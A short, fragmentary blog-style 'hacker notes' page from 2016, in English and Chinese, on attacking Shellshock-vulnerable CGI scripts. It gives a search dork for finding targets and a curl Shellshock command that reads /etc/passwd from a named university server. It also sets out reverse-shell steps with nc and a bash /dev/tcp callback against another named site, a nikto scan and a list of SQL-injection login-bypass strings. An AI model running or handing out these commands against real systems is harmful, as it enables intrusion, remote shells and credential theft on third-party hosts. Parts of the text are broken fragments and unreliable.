A notes for being a hacker
更多文章
Release Date: 2016/10/19
Introduction to the vulnerability
如果主機有開放一般帳號可存取 shell,透過這個漏洞
NOTE:即使系統沒有開放 shell,攻擊者仍可以透過其他漏洞先取得 shell 存取後,再進行這個漏洞的攻擊。
攻擊工具
Resolution
Scanning the target with Google
inurl:cgi-bin filetype:sh site:edu inurl:/cgi-bin/ ext:sh
Attempt to get the username remotely
curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh
Reverse SHELL
> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls
if it response as 'Command sent to the server!', continue with the follows
> nc -lp 4444 -vv Waiting untill the PHP command is completed. If all goes well, you can issue any commands here.
Open another terminal. issue the command
> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"
cd /pentest/web/nikto perl nikto.pl -host 123.123.123.123
Checking if the Login form with SQL Injection
http://www.joellipman.com/articles/w...abilities.html
// Username admin' -- admin' # admin'/* // Password ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1--